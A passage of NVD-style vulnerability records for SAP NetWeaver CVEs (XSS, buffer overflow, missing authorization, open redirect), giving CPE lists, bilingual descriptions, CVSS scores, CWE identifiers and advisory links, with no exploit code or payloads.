"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 15:55
Modified
2024-11-21 02:05
Severity ?
Summary
The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | - | |
| sap | netweaver_solution_manager | 7.0 | |
| sap | netweaver_solution_manager | 7.1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_solution_manager:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A4F0D870-D720-4E27-9C4E-795BFDC2AC25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_solution_manager:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "1173BB75-5F5B-4648-8743-8AEC9B153426",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors."
},
{
"lang": "es",
"value": "Solution Manager en SAP NetWeaver no restringe debidamente el acceso, lo que permite a atacantes remotos obtener informaci\u00f3n sensible a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2014-1960",
"lastModified": "2024-11-21T02:05:21.350",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-02-14T15:55:07.437",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56942"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1828885"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56942"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91093"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1828885"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2010-04-29 17:30
Modified
2024-11-21 01:14
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F59EAE32-F443-490E-9213-596430E406E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en SAP NetWeaver v2004, anterior a SP21 y v2004s anterior a SP13 permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2010-1609",
"lastModified": "2024-11-21T01:14:47.847",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2010-04-29T17:30:00.870",
"references": [
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/38629"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2010/0397"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/38629"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2010/0397"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2022-04-12 17:15
Modified
2024-11-21 06:57
Severity ?
Summary
By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3111311 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3111311 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | 7.22ext | |
| sap | netweaver | 7.49 | |
| sap | netweaver | 7.53 | |
| sap | netweaver | 7.77 | |
| sap | netweaver | 7.81 | |
| sap | netweaver | 7.85 | |
| sap | netweaver | 7.86 | |
| sap | netweaver | kernel_7.22 | |
| sap | netweaver | krnl64nuc_7.22 | |
| sap | netweaver | krnl64uc_7.22 | |
| sap | web_dispatcher | 7.53 | |
| sap | web_dispatcher | 7.77 | |
| sap | web_dispatcher | 7.81 | |
| sap | web_dispatcher | 7.85 | |
| sap | web_dispatcher | 7.86 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "71AFBCEC-649C-4389-85C2-6C245290E91A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.49:*:*:*:*:*:*:*",
"matchCriteriaId": "E7245DC9-CB62-477A-86B3-41CBBB878F3B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "77CA44BC-8650-4A20-A359-0FE568E1B345",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.77:*:*:*:*:*:*:*",
"matchCriteriaId": "95D831B3-1B5B-441F-8429-B6EC7161A7B5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.81:*:*:*:*:*:*:*",
"matchCriteriaId": "6D232796-B486-4C58-AD93-46D5948F1586",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.85:*:*:*:*:*:*:*",
"matchCriteriaId": "93AA0006-CEEC-4037-B1FC-3C4A7E0D1905",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.86:*:*:*:*:*:*:*",
"matchCriteriaId": "C269F298-5AB8-4AA1-911A-403F5EA62DEE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "87AABA4D-7683-47B4-BAF7-22AA42E074D4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "2D28A3C2-D601-405F-A17C-6A6EBE43DF31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "AA038239-63B2-4C31-8E74-EE053548621D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "47D4D542-2EC2-490B-B4E9-3E7BB8D59B77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.77:*:*:*:*:*:*:*",
"matchCriteriaId": "E33D9481-3CF6-4AA3-B115-7903AC6DAE25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.81:*:*:*:*:*:*:*",
"matchCriteriaId": "49FF2A5B-E5F0-4991-9AA3-7CB3B8C62941",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.85:*:*:*:*:*:*:*",
"matchCriteriaId": "F74EE4D5-E968-4851-89E6-4152F64930F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.86:*:*:*:*:*:*:*",
"matchCriteriaId": "327A87AD-6635-4511-8505-F4418CD9D49C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service."
},
{
"lang": "es",
"value": "Mediante valores de entrada demasiado largos, un atacante puede forzar la sobreescritura de la pila interna del programa en SAP Web Dispatcher - versiones 7.53, 7.77, 7.81, 7.85, 7.86, o Internet Communication Manager - versiones KRNL64NUC 7. 22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, lo que hace que estos programas no est\u00e9n disponibles, conllevando a una denegaci\u00f3n de servicio"
}
],
"id": "CVE-2022-28772",
"lastModified": "2024-11-21T06:57:54.167",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-04-12T17:15:10.833",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3111311"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3111311"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-121"
}
],
"source": "cna@sap.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AFD395C-99B0-4AA2-AF4D-5D29076ED6E2",
"versionEndIncluding": "7.02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A35F93E3-FC19-4A52-885A-AA2112CAF34D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors."
},
{
"lang": "es",
"value": "J2EE Engine en SAP NetWeaver 6.40, 7.02, y anteriores versiones permite a atacantes remotos redirigir usuarios a sitios web arbitrarios para llevar a cabo ataques de phishing, y obtener informaci\u00f3n sensible (cookies y SAPPASSPORT) a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2013-6814",
"lastModified": "2024-11-21T01:59:45.480",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-11-20T14:12:30.913",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55778"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1854826"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55778"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1854826"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-04-01 14:59
Modified
2024-11-21 02:28
Severity ?
Summary
Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369."
},
{
"lang": "es",
"value": "Desbordamiento de buffer en la funci\u00f3n C_SAPGPARAM en NetWeaver Dispatcher en SAP KERNEL 7.00 (7000.52.12.34966) y 7.40 (7400.12.21.30308) permite a usuarios remotos autenticados causar una denegaci\u00f3n de servicio o posiblemente ejecutar c\u00f3digo arbitrario a trav\u00e9s de vectores no especificados, tambi\u00e9n conocido como la nota de seguridad de SAP 2063369."
}
],
"id": "CVE-2015-2815",
"lastModified": "2024-11-21T02:28:08.397",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2015-04-01T14:59:13.770",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2015/Jun/61"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/73897"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2015/Jun/61"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/73897"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-10-28 22:55
Modified
2024-11-21 01:53
Severity ?
Summary
Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| opentext | opentext\/ixos_ecm_for_sap_netweaver | - | |
| sap | netweaver | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opentext:opentext\\/ixos_ecm_for_sap_netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4D0B3298-7527-4C91-AD8F-372B3977620C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad sin especificar en OpenText/IXOS ECM para SAP NetWeaver permite a atacantes remotos ejecutar c\u00f3digo arbitrario ABAP a trav\u00e9s de vectores sin especificar."
}
],
"id": "CVE-2013-3243",
"lastModified": "2024-11-21T01:53:15.530",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-10-28T22:55:03.680",
"references": [
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-12 20:15
Modified
2024-11-21 05:35
Severity ?
Summary
Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2863397 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2863397 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "EEBE3705-6F2A-4FC0-8FB8-B908DDC8A4C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.51:*:*:*:*:*:*:*",
"matchCriteriaId": "15229BC5-B8AB-4EA3-91A9-54B080725A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.52:*:*:*:*:*:*:*",
"matchCriteriaId": "DDAE64AB-5839-4177-B07E-6C24D2F27B39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "87343FA6-3D2D-4F9A-8999-F3996B8C7325",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "E98D0261-4C52-45E1-BF8F-B2A15CE426EC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability."
},
{
"lang": "es",
"value": "Bajo determinadas condiciones, ABAP Online Community en SAP NetWeaver (SAP_BASIS versi\u00f3n 7.40) y SAP S/4HANA (SAP_BASIS versiones 7.50, 7.51, 7.52, 7.53, 7.54), no codifica suficientemente las entradas controladas por el usuario, resultando en una vulnerabilidad de tipo Cross-Site Scripting (XSS) Reflejado."
}
],
"id": "CVE-2020-6184",
"lastModified": "2024-11-21T05:35:15.393",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
